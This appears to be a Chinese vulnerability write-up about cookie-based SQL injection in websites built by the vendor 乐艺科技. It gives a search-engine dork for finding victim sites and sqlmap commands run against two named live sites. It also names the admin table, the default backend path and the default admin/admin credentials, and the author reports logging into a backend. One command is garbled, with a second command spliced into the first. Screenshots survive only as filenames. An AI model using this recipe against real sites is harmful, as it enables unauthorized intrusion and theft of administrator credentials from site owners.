某通用建站系统cookie中转注入

google关键字:技术支持:乐艺科技(有点多)

一个叫乐艺科技的公司的建站系统 有过滤但用的是通用防注入,可以cookie中转注入

LU@{@377RD]@Z]L))SPVUTG.jpg

一看就感觉是通用防注入

经验证,这个公司建的站基本都是通用防注入,所以都可以cookie中转注入,所有参数都行,就随便挑参数验证

证明:

1.sqlmap.py -u "http://www.szzel.com/product.asp" --cookie "sqlmap.py -u "http://www.yunyvision.com/case.asp" --cookie "ncid=19" --level 2 -Tncid=19" --level 2

7_1R40(UCIWHMC[UE~8Z{Z3.jpg

8VT%U9{}3U)IKZ(4_FLSBPD.jpg

}H2JHOI9BFA%PO1_AG7Z}00.jpg

管理员表名是:sd_admin

sqlmap.py -u "http://www.yunyvision.com/case.asp" --cookie "ncid=19" --level 2

AR`W)3FXSENZQOVFWG4~]5E.jpg

看了一下 基本都是这些一样的表,里面存着管理员密码 就不一一跑了证明通用即可

默认后台:lesiure/index.asp 解密管理员密码 admin admin

登陆后台:

8K$2XKYVOVN37`IOUZP$PFX.jpg